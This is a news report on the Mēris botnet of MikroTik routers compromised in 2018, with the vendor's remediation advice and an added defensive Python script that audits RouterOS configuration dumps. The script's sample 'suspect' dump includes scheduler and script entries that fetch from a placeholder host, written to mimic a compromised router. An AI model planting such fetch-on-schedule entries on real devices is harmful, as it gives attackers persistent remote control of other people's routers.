16 September 2021

Mēris botnet targets MikroTik routers hacked in 2018


The Mēris botnet, responsible for the largest application-layer DDoS attack recorded to date, which hit the Russian Internet giant Yandex last week, is built from MikroTik routers that were compromised back in 2018, according to Latvian network equipment manufacturer MikroTik.

A joint investigation by Yandex and Qrator Labs found that Mēris (Latvian for "plague") comprises more than 200,000 bots, the vast majority of them MikroTik routers running various versions of RouterOS.

According to MikroTik, the bots are routers that were compromised in 2018 through a RouterOS vulnerability that was patched quickly at the time. The vendor explained that the botnet is made up of devices that were never properly secured afterwards, even though a patch that could have prevented the infection has been available since then.

“Unfortunately, closing the vulnerability does not immediately protect these routers. If somebody got your password in 2018, just an upgrade will not help. You must also change password, re-check your firewall if it does not allow remote access to unknown parties, and look for scripts that you did not create,” a MikroTik employee said in a blog post.

“As far as we know right now, there are no new vulnerabilities in these devices. RouterOS has been recently independently audited by several contractors.”

MikroTik added that it has tried to inform customers about the issue, but many of them have never been in contact with the company and do not actively monitor their devices.

Router owners are advised to change their passwords, re-check their firewall settings so that remote access from untrusted parties is blocked, and look for scripts they did not create. The company also recommends disabling SOCKS and reviewing the System -> Scheduler menu, disabling any suspicious entries.

“By default, there should be no Scheduler rules, and SOCKS should be off,” MikroTik says.
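The checks above can be run offline against a configuration dump. The script below is an added example, not MikroTik's code and not from the original article: it parses the text a router prints for `/export` (over SSH or the terminal) and flags the four things MikroTik tells owners to look at: SOCKS enabled, scheduler entries, scripts, and a firewall that lets anyone reach the management services. The two sample dumps are constructed, and the management-port list and the firewall heuristics are my assumptions rather than anything the vendor published.

```python
"""Offline audit of a RouterOS `/export` dump for the indicators MikroTik
lists: SOCKS left on, scheduler entries, unknown scripts, and a firewall
that lets anyone reach the management services."""
import re
from collections import defaultdict

# Assumed list of RouterOS management TCP ports an attacker needs to reach:
# 8291 = Winbox, 8728/8729 = API, 21/22/23/80/443 = ftp/ssh/telnet/www.
MGMT_PORTS = {"21", "22", "23", "80", "443", "8291", "8728", "8729"}

# key=value pairs; quoted values may contain spaces and escaped quotes.
_KV = re.compile(r'([\w.-]+)=("(?:[^"\\]|\\.)*"|\S+)')


def parse_export(text):
    """Turn `/export` output into {section: [(verb, {key: value}), ...]}.
    Section headers start with '/', entries are 'add' / 'set' lines, and a
    trailing backslash continues an entry on the next (indented) line."""
    sections = defaultdict(list)
    section, buf = None, ""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.endswith("\\"):
            buf += line[:-1].rstrip() + " "
            continue
        line, buf = buf + line, ""
        if line.startswith("/"):
            # normalise "/ip/socks" and "/ip socks" to one spelling
            section = "/" + " ".join(line.strip("/").replace("/", " ").split())
            continue
        verb, _, rest = line.partition(" ")
        attrs = {k: v.strip('"') for k, v in _KV.findall(rest)}
        sections[section].append((verb, attrs))
    return sections


def audit_export(text):
    """Return a list of human-readable findings; an empty list means nothing was flagged."""
    cfg = parse_export(text)
    findings = []

    # SOCKS is off by default on a stock router.
    for _, a in cfg.get("/ip socks", []):
        if a.get("enabled") == "yes":
            findings.append(f"SOCKS proxy enabled on port {a.get('port', '?')}")

    # A stock router has no scheduler entries and no scripts at all.
    for verb, a in cfg.get("/system scheduler", []):
        if verb == "add":
            findings.append(f"scheduler entry {a.get('name')!r} runs: {a.get('on-event', '')}")
    for verb, a in cfg.get("/system script", []):
        if verb == "add":
            findings.append(f"script {a.get('name')!r} present")

    # Input chain: accept rules that expose management ports without any
    # source restriction, and a chain with no drop rule at all. Port ranges
    # such as 8291-8300 are not expanded; only comma-separated lists are checked.
    inp = [a for _, a in cfg.get("/ip firewall filter", []) if a.get("chain") == "input"]
    for a in inp:
        ports = set(a.get("dst-port", "").split(",")) & MGMT_PORTS
        restricted = any(k in a for k in ("src-address", "src-address-list",
                                          "in-interface", "in-interface-list"))
        if a.get("action") == "accept" and ports and not restricted:
            findings.append("input accepts " + ",".join(sorted(ports)) + "/tcp from any source")
    if not any(a.get("action") == "drop" for a in inp):
        findings.append("input chain never drops; management services reachable from anywhere")
    return findings


# Constructed sample dumps for demonstration (not real router output).
SUSPECT = """\
# sep/16/2021 10:00:00 by RouterOS 6.42.0
/ip socks
set enabled=yes port=5678
/system scheduler
add interval=10m name=schedule1 on-event="/tool fetch url=http://192.0.2.10/u mode=http" policy=read,write,test
/system script
add name=script1 owner=admin policy=read,write,test source="/tool fetch url=http://192.0.2.10/s"
/ip firewall filter
add action=accept chain=input connection-state=established,related
add action=accept chain=input dst-port=8291 protocol=tcp
"""

CLEAN = """\
/ip firewall filter
add action=accept chain=input comment="defconf: accept established,related" connection-state=established,related
add action=accept chain=input comment="defconf: accept ICMP" protocol=icmp
add action=drop chain=input comment="defconf: drop all not coming from LAN" \\
    in-interface-list=!LAN
/ip service
set telnet disabled=yes
"""

if __name__ == "__main__":
    for name, dump in (("suspect", SUSPECT), ("clean", CLEAN)):
        print(name, audit_export(dump) or ["no findings"])
```

Feed it the output of `/export` (or `/export verbose`, which also prints default-valued sections) from each router; a clean default configuration produces no findings, while a router with SOCKS on, a scheduler entry, a script and an unrestricted Winbox accept rule is flagged on every point. Any finding still has to be followed by the vendor's manual steps: change the password, remove what you did not create, and upgrade.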
